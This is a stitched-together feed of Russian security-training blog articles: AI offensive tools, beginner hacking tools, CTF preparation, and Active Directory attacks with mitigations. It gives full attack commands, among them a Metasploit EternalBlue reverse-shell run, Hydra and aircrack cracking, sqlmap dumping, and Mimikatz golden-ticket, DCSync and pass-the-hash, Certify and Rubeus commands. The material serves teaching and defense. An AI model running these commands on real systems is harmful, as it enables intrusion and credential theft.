<p>Мощный инструмент для моделирования атак социальной инженерии. С помощью AI он анализирует поведение пользователей, их типичные действия и корпоративный контекст - и на этой основе формирует максимально реалистичные фишинговые письма. Применяется в тренировках и при проверке устойчивости сотрудников к атакам.</p>

<div data-toc="CipherGAN — AI-модель для криптоанализа простых шифров" id="ciphergan"></div>
<h3><a href="https://github.com/for-ai/CipherGAN" target="_blank">CipherGAN</a> — AI-модель для криптоанализа простых шифров</h3>
<p>Исследовательская AI-система, обученная распознавать и расшифровывать текст, зашифрованный классическими алгоритмами, вроде шифра Цезаря и Виженера. Работает без пары «открытый–закрытый текст» — модель учится восстанавливать исходные данные самостоятельно, на основе структуры языка. Подходит для анализа простых или самописных схем шифрования. Интересна как пример того, как нейросети применяются в криптоанализе.</p>

<div data-toc="DarkTrace Antigena - автономная защита в действии" id="darktrace"></div>
<h3><a href="https://www.darktrace.com/products/respond" target="_blank">DarkTrace Antigena</a> - автономная защита в действии</h3>
<p>Хотя Antigena традиционно считается инструментом защиты, в рамках offensive security её можно применять для тестирования устойчивости инфраструктуры в условиях реальных атак. ИИ-движок способен не просто выявить, но и самостоятельно заблокировать вредоносную активность — в том числе нестандартные векторы.</p>

<div data-toc="VulnGPT - языковой интерфейс для поиска уязвимостей" id="vulngpt"></div>
<h3><a href="https://github.com/paulshovon94/VulnGPT" target="_blank">VulnGPT</a> - языковой интерфейс для поиска уязвимостей</h3>
<p>AI‑помощник, умеющий находить уязвимости по описанию на естественном языке. Достаточно ввести, например: «Проверь на SQL-инъекцию форму логина» — и VulnGPT проанализирует соответствующий участок кода. Основан на больших языковых моделях и базе данных уязвимостей. Ускоряет аудит и полезен при разборе чужих проектов.</p>

<div data-toc="ZeroDay Sentinel - прогнозирование CVE до официальных релизов" id="zeroday"></div>
<h3><a href="https://github.com/codenet-community/ZERO-DAY-SENTINEL" target="_blank">ZeroDay Sentinel</a> - прогнозирование CVE до официальных релизов</h3>
<p>AI‑система, которая отслеживает активность в даркнете, на форумах и в технических обсуждениях, чтобы прогнозировать появление новых уязвимостей. Используется как в защите, так и в наступательных целях — позволяет заранее готовить эксплойты к ещё не публичным багам.</p>

<div data-toc="SpiderFoot - автоматизированная разведка" id="spiderfoot"></div>
<h3><a href="https://github.com/smicallef/spiderfoot" target="_blank">SpiderFoot</a> - автоматизированная разведка</h3>
<p>Фреймворк для информационной разведки (OSINT). Умеет искать субдомены, открытые порты, метаданные, корпоративные утечки и другое. Подходит для быстрого анализа поверхности атаки и первичного сбора информации перед наступательной фазой.</p>

<div data-toc="Watson Cyber AI - аналитика угроз на базе IBM" id="watsonai"></div>
<h3><a href="https://www.ibm.com/watson" target="_blank">Watson Cyber AI</a> - аналитика угроз на базе IBM</h3>
<p>Комплексная система для анализа инцидентов и поведения угроз. Используется в SOC, но может быть применена и в offensive security — для анализа взаимодействий атакующих с инфраструктурой, построения моделей поведения и предсказания шагов защитников.</p>

<div data-toc="Cortex XDR - автоматизация реагирования на угрозы" id="cortex-xdr"></div>
<h3><a href="https://www.paloaltonetworks.com/cortex/cortex-xdr" target="_blank">Cortex XDR</a> - автоматизация реагирования на угрозы</h3>
<p>Продукт от Palo Alto, объединяющий аналитику и автономные действия: изоляция хостов, блокировка активности, реагирование на подозрительное поведение. ИИ‑движок анализирует логи и трафик, выявляя закономерности. Используется как в защитных, так и в атакующих сценариях — например, для тестирования действий Blue Team.</p>

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>
<p>AI-инструменты становятся незаменимыми в арсенале специалистов по кибербезопасности. Они не заменяют искусственный интеллект - это не замена специалисту, а помощник, который снимает с него часть рутинной работы и даёт преимущество в скорости, точности и глубине анализа.</p>

<p>Если вы только осваиваете тему offensive security - начните с автоматизации рутинных задач и информационной разведки. А если вы уже опытный практик - присмотритесь к инструментам на базе AI: они позволяют действовать быстрее и точнее.</p>

<p><b>💬 А какие AI-инструменты уже стали частью вашего offensive-набора? Поделитесь в комментариях!</b></p>

</body>
</html>


ТОП‑10 AI‑инструментов для наступательной кибербезопасности в 2025 году

Узнайте, какие навыки из CTF пригодятся пентестеру и чем отличается работа в реальных проектах от хакерских соревнований.

Чему учат CTF и как это пригодится в карьере пентестера

Застряли на CTF-задаче и на грани сдаться? В статье — проверенные советы, как справиться с фрустрацией, сохранить концентрацию и извлечь максимум пользы из сложных моментов соревнования.

Фрустрация в CTF: как выйти из тупика и двигаться дальше

Хотите начать карьеру в кибербезопасности, но не знаете, с чего начать? Мы собрали топ-10 инструментов для начинающего хакера: от Nmap до Metasploit. Простые примеры, реальные кейсы и советы по использованию.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>10 лучших инструментов для начинающего хакера: практический гайд</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Начать путь в кибербезопасности и этичном хакинге непросто. Ведь сотни программ, терминов и направлений могут
    запутать. Мы не только перечислим ключевые инструменты, но и расскажем, как их использовать и где скачать.</p>
<p>Дисклеймер: Все примеры применяйте только в легальных целях — на своих системах или с разрешения владельца.</p>

<div data-toc="nmap" id="nmap"></div>
<h3>Nmap — сканер сети</h3>
<p><b>Что это:</b> утилита для анализа сетей, портов и служб.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Определяет активные устройства в сети.</li>
    <li>Показывает открытые порты и запущенные сервисы (веб-сервер, база данных).</li>
    <li>Помогает находить потенциальные точки входа для атак.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите Nmap с официального сайта.</li>
    <li>Пример базового сканирования: <code>nmap -sS 192.168.1.1</code></li>
    <li>Агрессивное сканирование (определение ОС и версий ПО): <code>nmap -A 192.168.1.1</code></li>
    <li>Проверка конкретных портов: <code>nmap -p 80,443</code></li>
</ul>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/nmap.png" alt="Nmap: сканирование сети и портов">

<div data-toc="Wireshark" id="wireshark"></div>
<h3>Wireshark — анализ трафика</h3>
<p><b>Что это:</b> сниффер для перехвата и анализа сетевых пакетов</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Изучение протоколов (HTTP, DNS, TCP).</li>
    <li>Поиск утечек данных (например, паролей в незашифрованном виде).</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Скачайте Wireshark с официального сайта.</li>
    <li>Запустите захват трафика на интерфейсе (например, Wi-Fi или Ethernet).</li>
    <li>Используйте фильтры:
        <ul>
            <li>http.request.method == "GET" — покажет все GET-запросы.</li>
            <li>ip.src == 192.168.1.1 — фильтр по IP-отправителю.</li>
        </ul>
    </li>
</ul>
<p>Пример: Обнаружение пароля в HTTP-запросе:</p>
<ol>
    <li>Откройте файл захвата.</li>
    <li>Примените фильтр http.request.method == "POST".</li>
    <li>Нажмите на пакет - кликните правой кнопкой - Follow - TCP Stream.</li>
</ol>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/wireshark.png" alt="Wireshark">

<div data-toc="Burp Suite" id="burp"></div>
<h3>Burp Suite — тестирование веб-приложений</h3>
<p><b>Что это:</b> платформа для поиска уязвимостей в веб-приложениях.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Перехват и модификация HTTP-запросов.</li>
    <li>Автоматическое сканирование на XSS, SQLi, CSRF.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Бесплатная версия Community Edition доступна на PortSwigger.</li>
    <li>Настройте браузер для работы через прокси Burp (127.0.0.1:8080).</li>
    <li>Включите перехват запросов (вкладка Proxy - Intercept is on).</li>
</ul>
<p>Пример теста SQLi:</p>
<ol>
    <li>Перехватите запрос с параметром id=1.</li>
    <li>Отправьте его в Repeater (Ctrl+R).</li>
    <li>Измените параметр на id=1'— если сервер вернёт ошибку, возможна уязвимость.</li>
</ol>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/burp.png" alt="Burp Suite">

<div data-toc="Metasploit Framework" id="metasploit"></div>
<h3>Metasploit Framework — платформа для эксплойтов</h3>
<p><b>Что это:</b> инструмент для разработки и запуска атак.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Проверка уязвимости систем к известным эксплойтам.</li>
    <li>Моделирование реальных атак для обучения.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите Metasploit в Kali Linux или скачайте с официального сайта.</li>
    <li>Запустите консоль: <code>msfconsole</code></li>
</ul>
<p>Пример атаки на EternalBlue:</p>
<pre>
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
</pre>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/metasploit.png" alt="Metasploit">

<div data-toc="John the Ripper" id="john"></div>
<h3>John the Ripper — взлом паролей</h3>
<p><b>Что это:</b> утилита для подбора паролей методом брутфорса или по словарю.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Проверка надёжности своих паролей.</li>
    <li>Понимание уязвимости слабых хешей.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите John через терминал: <code>sudo apt install john</code></li>
</ul>
<p>Пример атаки на хеш MD5:</p>
<pre>john --format=raw-md5 --wordlist=rockyou.txt hash.txt</pre>
<p><b>Где взять словари:</b> Известный словарь rockyou.txt есть в Kali Linux (путь: <code>/usr/share/wordlists/</code>).</p>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/john.png" alt="John the Ripper">

<div data-toc="Aircrack-ng" id="aircrack"></div>
<h3>Aircrack-ng — взлом Wi-Fi</h3>
<p><b>Что это:</b> набор инструментов для аудита безопасности беспроводных сетей.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Проверка устойчивости Wi-Fi к атакам (например, WPA/WPA2).</li>
    <li>Поиск слабых точек в настройке роутера.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите в Kali Linux: <code>sudo apt install aircrack-ng</code></li>
</ul>
<p>Пример перехвата handshake:</p>
<ol>
    <li>Переведите адаптер в режим монитора: <code>airmon-ng start wlan0</code></li>
    <li>Запустите сканирование сетей: <code>airodump-ng wlan0mon</code></li>
    <li>Захватите handshake: <code>airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon</code></li>
    <li>Запустите подбор пароля: <code>aircrack-ng -w rockyou.txt capture.cap</code></li>
</ol>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/aircrack.png" alt="Aircrack-ng">

<div data-toc="Hydra" id="hydra"></div>
<h3>Hydra — брутфорс онлайн-сервисов</h3>
<p><b>Что это:</b> утилита для подбора логинов и паролей к SSH, FTP, RDP и другим сервисам.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Тестирование защиты от автоматических атак.</li>
    <li>Понимание важности ограничения попыток ввода пароля.</li>
</ul>
<p><b>Пример атаки на SSH:</b></p>
<pre>hydra -l admin -P passwords.txt ssh://192.168.1.1 -t 4 -V</pre>
<p><code>-t 4</code> — количество потоков. <code>-V</code> — вывод подробного лога.</p>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/hydra.png" alt="Hydra">

<div data-toc="sqlmap" id="sqlmap"></div>
<h3>sqlmap — автоматизация SQL-инъекций</h3>
<p><b>Что это:</b> инструмент для поиска и эксплуатации уязвимостей в базах данных.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Автоматизация рутинных задач при тестировании на SQLi.</li>
    <li>Извлечение структуры БД, данных пользователей и т.д.</li>
</ul>
<p><b>Пример использования:</b></p>
<pre>sqlmap -u "http://site.com/news?id=1" --dbs</pre>
<pre>sqlmap -u "http://site.com/news?id=1" -D users --tables</pre>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/sqlmap.png" alt="sqlmap">

<div data-toc="Dirb" id="dirb"></div>
<h3>Dirb — поиск скрытых директорий на веб-серверах</h3>
<p><b>Что это:</b> утилита для перебора путей и файлов на веб-сервере с использованием словарей.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Обнаружение скрытых страниц (например, админ-панелей, резервных копий).</li>
    <li>Поиск уязвимых файлов (config.php, backup.zip).</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите в Kali Linux: <code>sudo apt install dirb</code></li>
    <li>Или скачайте с официального репозитория.</li>
</ul>
<p><b>Примеры:</b></p>
<ul>
    <li><code>dirb http://site.com/ /usr/share/wordlists/dirb/common.txt</code></li>
    <li>Проверка с расширениями: <code>dirb http://site.com/ -X .php,.bak</code></li>
    <li>Свой словарь: <code>dirb http://site.com/ ~/custom_wordlist.txt</code></li>
</ul>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/dirb.png" alt="Dirb">

<div data-toc="OWASP ZAP" id="owasp-zap"></div>
<h3>OWASP ZAP — бесплатный аналог Burp Suite</h3>
<p><b>Что это:</b> открытый инструмент для поиска уязвимостей в веб-приложениях.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Автоматическое сканирование на OWASP Top-10 (например, инъекции, небезопасные настройки).</li>
    <li>Работает «из коробки» — минимум настроек.</li>
</ul>
<p><b>Пример использования:</b></p>
<ul>
    <li>Запустите ZAP.</li>
    <li>Введите URL сайта в раздел Quick Start → Automated Scan.</li>
    <li>Анализируйте отчёт во вкладке Alerts.</li>
</ul>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/zap.png" alt="OWASP ZAP">

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>
<p>Эти 10 инструментов — лишь начало пути. Освоив их, вы сможете уверенно ориентироваться в базовых задачах тестирования на проникновение, анализа трафика и поиска уязвимостей.</p>

<p>Дальше — больше: изучайте реальные сценарии атак, <a href="https://hackerlab.pro/" target="_blank">участвуйте в CTF-соревнованиях</a>, работайте с боевыми инфраструктурами и следите за новыми уязвимостями. Практика — ключ к мастерству в кибербезопасности.</p>

</body>
</html>


TOP-10 инструментов для начинающего хакера: с чего начать путь в кибербезопасности

Узнай, как новичку подготовиться к CTF-соревнованиям по информационной безопасности: форматы, практики, советы и ресурсы для старта

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>Как начать участвовать в CTF-соревнованиях: руководство для новичков</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>У многих новичков в информационной безопасности в определённый этап постижения этой сферы возникает желание участия в
    CTF-соревнованиях. Но большинство таких энтузиастов сталкивается с проблемой подготовки к ним. В этой статье я
    постараюсь убрать проблему неопределённости в подготовках к CTF, и составить план подготовки к первым соревнованиям
    основываясь на личном опыте.</p>

<div data-toc="Виды CTF" id="types"></div>
<h3>Виды CTF</h3>
<p>Перед подготовкой стоит определиться с видом соревнований к которым собираетесь готовиться, из собственной практики я
    выделил всего два вида: Task-based и Attack Defense.</p>

<div data-toc="Task-based" id="task-based"></div>
<h3>Task-based</h3>
<p>С тасками всё относительно просто, условно задаются тематики в рамках которых и будут строиться
    задачки(Реверс-инжиниринг, форензика, OSINT, криптография и т.д). Ранее я разбирал таски OSINT соревнований в
    которых участвовал и как в качестве наглядного примера советую с ними ознакомиться: <a target="_blank"
                                                                                           href="https://codeby.net/threads/reshayem-osint-taski-v-ctf-sorevnovaniyakh-chast-1-ili-kak-ya-iskal-aeroport-i-gagarina.81120/">часть
        1</a>, <a target="_blank"
                  href="https://codeby.net/threads/reshayem-osint-taski-v-ctf-sorevnovaniyakh-ili-kak-ya-iskal-model-kamery-prestupnika-chast-2.81121/">часть
        2</a>, <a target="_blank"
                  href="https://codeby.net/threads/reshayem-osint-taski-v-ctf-sorevnovaniyakh-chast-3-ili-kak-ya-razoblochal-sigaint.81122/">часть
        3</a>.</p>

<p>Такой формат соревнований очень хорош для новичков т.к такие темы как: криптография, реверс-инжиниринг, форензика,
    OSINT и веб-уязвимости встречаются в большинстве такого вида соревнований. И главное чем хороши таски это тем, что
    ваши флаги покорно будут вас ждать и никуда не денуться пока вы не решите задачку.</p>

<img src="https://hackerlab.pro/game_api/articles/static/4e560cc2-90fd-433d-898e-38d21bc07ebc/tasks_table.png"
     alt="Таблица заданий">

<p>Для того чтобы спланировать участие в этих соревнований, достаточно просто набрать команду, выявить темы в которых
    каждый член команды больше всего разбирается и распределить кто к какой теме будет готовиться. Для подготовки
    требуется лишь практический опыт и софт составляющая.</p>

<div data-toc="Attack Defense" id="attack-defense"></div>
<h3>Attack Defense</h3>
<p>Этот вид соревнований для “настоящих ценителей”, новичкам в таком виде соревнований будет достаточно сложно, но
    безусловно они получат хороший практический опыт в сфере ИБ. Суть соревнований заключается в том, что у каждой
    команды имеется свой сервер и они находятся все в одной сети, будь то виртуальные машины или VPN, в каждом сервисе
    оставлены уязвимости и чаще всего требуется завладеть админкой сервиса, захватить флаг и защитить свои сервисы
    закрытием уязвимостей которые были найдены у других команд.</p>

<p>Сервисы в основном будут запускаться через docker-compose и обязательно нужно иметь навыки запуска сервисов через
    docker. Чаще всего он уже предустановлен на сервере. Для запуска потребуется войти в директорию сервиса,
    ознакомиться с файлом README.md в котором будет описан процесс запуска сервиса, но чаще всего просто потребуется
    прописать docker-compose up.</p>

<img src="https://hackerlab.pro/game_api/articles/static/4e560cc2-90fd-433d-898e-38d21bc07ebc/docker.png"
     alt="Docker">

<p>Соревнования Attack Defense подразумевают знания эксплуатации веб-уязвимостей, к которым относятся: SQLInjection,
    XSS-уязвимости, CSRF, SSRF, IDOR и LFI. Кратко объясню суть этих уязвимостей:</p>

<ul>
    <li>SQL Injection: злоумышленник внедряет вредоносный SQL-код через входные данные(например формы), чтобы
        манипулировать базой данных.
    </li>
    <li>Межсайтовый скриптинг (XSS): внедрение JavaScript-кода на страницу, который выполняется в браузере жертвы.</li>
    <li>Подделка межсайтовых запросов (CSRF): злоумышленник заставляет авторизированного пользователя выполнить действия
        без его согласия(например перевод средств).
    </li>
    <li>Серверная подделка запросов (SSRF): принуждение сервера к выполнению запросов к внутренним или сторонним
        ресурсам.
    </li>
    <li>Небезопасные прямые ссылки (IDOR): Доступ к данным через подмену идентификаторов в URL (например
        /user?id=123→id=124).
    </li>
    <li>Локальное включение файлов (LFI): Чтение локальных файлов через параметры (например ?file=/etc/passwd).</li>
</ul>

<p>Уязвимости из вышеперечисленных самые распространённые в Attack Defense и подготовку команды нужно ориентировать
    именно на них, но специфика подготовки будет заключаться в навыках защиты и нападения.</p>

<p>Для защиты потребуется изучить уязвимости в плане кодовой составляющей, знать из-за чего возникают эти уязвимости,
    ориентация в логике работы кода и хорошие знания в программировании. Также засчёт изучения кода можно атаковать,
    занимаясь реверс-инжинирингом, или подсказывать пути атаки для атакующих коллег.</p>

<p>Для атаки потребуется практический опыт в эксплуатации веб-уязвимостей и умение их находить. В качестве тренировки
    можно пользоваться различными интернет-ресурсами предназначенными для оттачивания этих навыков, например <a
            target="_blank"
            href="https://hackerlab.pro">HackerLab</a>,
    образами виртуальных машин и подобным. Навыки в программировании будут крайне полезными атакующим для написания
    простых эксплоитов на том же Python, что сможет автоматизировать процесс добычи флагов и сдачи их в жюрейку (систему
    для начисления баллов за флаги).</p>

<p>Одним из самых важных и очевидных моментов является знание формата флага, что организаторы как правило должны
    проговаривать перед началом соревнований. Чаще всего это формат некоего хеша.</p>

<div data-toc="Заключение" id="сonclusion"></div>
<h3>Заключение</h3>
<p>Эти простые советы помогут вам составить чёткий план подготовки к соревнованиям, а исходя из этого плана можно будет
    составить конкретный план действий.</p>
<blockquote>
    <p>Всё, что нужно для старта — уже на HackerLab!</p>
    <p>👉 <a href="https://hackerlab.pro/" target="_blank">Заходи, решай, прокачивайся!</a></p>
</blockquote>
</body>
</html>


Как начать участвовать в CTF-соревнованиях: руководство для новичков

Узнайте о самых распространенных уязвимостях Active Directory, которые эксплуатируют хакеры. Разбор реальных кейсов, практические советы по защите и рекомендации для пентестеров

<!doctype html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Топ-5 уязвимостей Active Directory, которые мы находим почти в каждой компании</title>
</head>
<body>
<p>Знаете ли вы, что простая конфигурационная ошибка в Active Directory может стать входным билетом злоумышленника в
    вашу сеть? Такие уязвимости мы видим почти в каждой компании.</p>

<div data-toc="1. Введение" id="introduction"></div>
<h2>Введение</h2>
<p>Active Directory (AD) — ключевая технология, на которой строится инфраструктура корпоративных сетей. Упрощая
    управление аутентификацией и доступами, AD зачастую становится лакомым куском для злоумышленников.</p>

<p>В этом материале мы собрали пять самых распространенных уязвимостей Active Directory, используемых на практике — от
    атак с Golden Ticket до DCSync. Вы узнаете, как они работают, что делают хакеры на следующем шаге и как этого
    избежать.</p>

<div data-toc="2. Golden Ticket" id="golden-ticket"></div>
<h2>1. Золотые билеты (Golden Ticket)</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/golden_ticket.png"
     alt="Golden Ticket">

<h3>Как это работает?</h3>
<p>Злоумышленник получает доступ к хэшу пароля учетной записи <b>KRBTGT</b> — системного сервиса, выдающего
    Kerberos-билеты. Используя этот хэш, он создает «золотой билет», дающий полный доступ к домену без проверки
    сервером.</p>

<p><b>Что делает атакующий дальше?</b></p>
<ul>
    <li>Создает учетные записи, невидимые для логов</li>
    <li>Получает доступ к критическим данным</li>
    <li>Использует постоянный доступ к инфраструктуре</li>
    <li>Подделывает билеты с любыми сроками действия, обходя двухфакторную аутентификацию</li>
</ul>

<p><b>Как это выглядит на практике:</b><br>
    В 2023 году банк в Восточной Европе потерял контроль над своей сетью. После компрометации KRBTGT злоумышленники
    мигрировали данные клиентов в течение нескольких дней, оставаясь незаметными.</p>

<h3>Пример:</h3>
<pre><code># Извлекаем хэш KRBTGT с помощью Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:krbtgt"'

# Создаем "золотой билет"
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:a9b3c... /ticket:golden.kirbi"'
</code></pre>

<h3>Как защититься?</h3>
<ul>
    <li>Регулярно меняйте пароль учетной записи KRBTGT (2 раза подряд для полной ротации)</li>
    <li>Включите аудит событий <b>4662</b> (доступ к объектам) для раннего выявления проблем.</li>
</ul>

<div data-toc="3. Уязвимости службы сертификатов AD CS" id="ad-cs"></div>
<h2>2. Уязвимости службы сертификатов AD CS</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/ad_cs.png"
     alt="AD CS">

<h3>В чем проблема?</h3>
<p>Служба AD CS, используемая для управления цифровыми сертификатами, может содержать уязвимые шаблоны. Эти шаблоны
    позволяют злоумышленнику успешно пройти аутентификацию, получив права администратора через сертификат.</p>

<p><b>Что делает злоумышленник дальше?</b></p>
<ul>
    <li>С помощью полученного сертификата компрометирует сессии через RDP, WinRM или SMB</li>
    <li>Устанавливает бэкдоры в инфраструктуре</li>
    <li>Использует сертификаты для выполнения атак Pass-the-Ticket (PtT)</li>
</ul>

<p><b>Реальный кейс:</b><br>
    В 2024 году ритейлер потерял 2,5 ТБ данных клиентов из-за атаки на AD CS. Злоумышленники использовали слабые
    настройки шаблонов для получения администраторских привилегий.</p>

<h3>Эксплуатация:</h3>
<pre><code># Поиск уязвимых шаблонов
Certify.exe find /vulnerable

# Запрос сертификата для доменного админа
Certify.exe request /ca:ca.corp.local\corp-CA /template:VulnerableTemplate /altname:Administrator
</code></pre>

<h3>Меры защиты</h3>
<ul>
    <li>Убедитесь, что шаблоны не используют <b>ENROLLEE_SUPPLIES_SUBJECT</b></li>
    <li>Проверьте права на использование шаблонов и ограничьте доступ к ним</li>
</ul>

<div data-toc="4. Pass-the-Hash (PtH)" id="pth"></div>
<h2>3. Pass-the-Hash (PtH)</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/pth.png"
     alt="PtH">

<h3>Как это работает?</h3>
<p>Хэши паролей NTLM, находящиеся в памяти LSASS, позволяют атакующему аутентифицироваться без знания реального
    пароля.</p>

<p><b>Что делает хакер дальше?</b></p>
<ul>
    <li>Распространяется через SMB или SQL-службы на другие машины</li>
    <li>Использует полученные привилегии для внедрения эксплойтов</li>
</ul>

<p><b>Пример атаки из жизни:</b><br>
    На одном из проектов злоумышленник с помощью PtH распространился от обычного пользователя до уровня Domain Admin
    менее чем за час.</p>

<h3>Пример</h3>
<pre><code># Дамп хэшей
sekurlsa::logonpasswords

# Используем хэш для доступа к серверу
sekurlsa::pth /user:Admin /domain:corp.local /ntlm:a9b3c... /run:"cmd.exe"
</code></pre>

<h3>Совет:</h3>
<ul>
    <li>Включите <b>Credential Guard</b> для защиты хэшей в памяти (учтите, что он защищает только локальные
        учетные записи)
    </li>
    <li>Перенастройте корпоративную инфраструктуру так, чтобы исключить использование NTLM или ограничьте его через
        Group Policy.
    </li>
</ul>

<div data-toc="5. DCSync-атаки" id="dcsync"></div>
<h2>4. DCSync-атаки</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/dcsync.png"
     alt="dcsync">

<h3>Что это?</h3>
<p>DCSync-атака позволяет злоумышленнику с правами <b>Replicating Directory Changes</b> выдавать себя за
    контроллер домена и запрашивать хэши паролей пользователей, включая администраторов.</p>

<p><b>Обычно затем атакующий делает следующее:</b></p>
<ul>
    <li>Переходит к созданию Golden Ticket</li>
    <li>Извлекает учетные записи привилегированных пользователей</li>
    <li>Получает полные учетные данные для компрометации сетевой инфраструктуры</li>
</ul>

<p><b>Кейс из практики:</b><br>
    В 2022 году группа киберпреступников проникла в инфраструктуру госучреждения и благодаря DCSync получила полный
    доступ к сети.</p>

<h3>Пример</h3>
<pre><code># Выполняем DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:Administrator"'
</code></pre>

<h3>Как защититься?</h3>
<ul>
    <li>Ограничьте доступ к правам <b>Replicating Directory Changes</b>, <b>Replicating Directory Changes
        All</b> и <b>Replicating Directory Changes In Filtered Set</b></li>
    <li>Ручной аудит списков доступа к AD для ключевых узлов</li>
</ul>

<div data-toc="6. Unconstrained Delegation" id="ud"></div>
<h2>5. Неограниченное делегирование (Unconstrained Delegation)</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/ud.png"
     alt="ud">

<h3>Почему это опасно?</h3>
<p>Сервисы с <b>Unconstrained Delegation</b> хранят TGT-билеты других пользователей, включая администраторов.
    Если хакер получает доступ к такому серверу, он может использовать эти билеты для выполнения любого действия от
    имени атакуемого пользователя.</p>

<p><b>Следующие шаги:</b></p>
<ul>
    <li>Эскалация привилегий</li>
    <li>Выполнение подложных транзакций в системах, подключенных к атакуемому серверу</li>
    <li>Использование TGT-билетов для выполнения атак Pass-the-Ticket (PtT)</li>
</ul>

<p><b>Реальный пример:</b><br>
    Производитель ПО был атакован через SQL-сервер с включенной делегацией. Билеты администраторов использовались для
    подключения к финансовым системам компании.</p>

<h3>Пример</h3>
<pre><code># Поиск серверов с Unconstrained Delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true}

# Кража TGT через SpoolService
Rubeus.exe monitor /interval:5 /filteruser:SERVER01$
</code></pre>

<h3>Рекомендации:</h3>
<ul>
    <li>Переведите все ресурсы на <b>Constrained Delegation</b></li>
    <li>Отключите делегацию для узлов, где она не требуется</li>
    <li>Проверьте Resource-Based Constrained Delegation (RBCD) и ограничьте ее использование</li>
</ul>

<div data-toc="7. Заключение" id="conclusion"></div>
<h2>Заключение</h2>
<p>Эти уязвимости подчеркивают, как легко атакующий может получить полномасштабный доступ через ошибки в конфигурации
    AD.</p>

<p><b>Ваши шаги:</b></p>
<ol>
    <li>Проверьте наличие описанных проблем в вашей сети.</li>
    <li>Ограничьте доступы и настройте аудит.</li>
    <li>Обучайте специалистов, чтобы держать инфраструктуру под контролем.</li>
</ol>

<h2>Часто задаваемые вопросы</h2>

<p><b>Q: Как часто нужно проверять AD на уязвимости?</b><br>
    A: Минимум раз в квартал + после любых изменений в инфраструктуре.</p>

<p><b>Q: Какие инструменты использовать для проверки?</b><br>
    A: BloodHound, PingCastle, ADRecon.</p>

<p><b>Q: Можно ли полностью защититься от этих атак?</b><br>
    A: 100% защиты нет, но можно снизить риски на 90% через правильную конфигурацию.</p>

<blockquote>
<p>Хотите научиться находить и использовать такие уязвимости в легальных пентестах? <b>29 мая стартует новый поток
    курса по тестированию AD от Codeby.</b></p>
<p>👉 <a href="https://ad.codeby.school/" target="_blank">Забронировать место на курсе</a></p>
</blockquote>
</body>
</html>

Топ-5 уязвимостей Active Directory, которые мы находим почти в каждой компании

Шесть инструментов, которые мы собрали в статье, — это твой первый боевой набор. Каждый из них открывает тебе глаза на то, как работает веб: что передаётся "за кадром", как устроены формы авторизации, какие ошибки допускают даже крупные компании

Блог

Самые популярные статьи: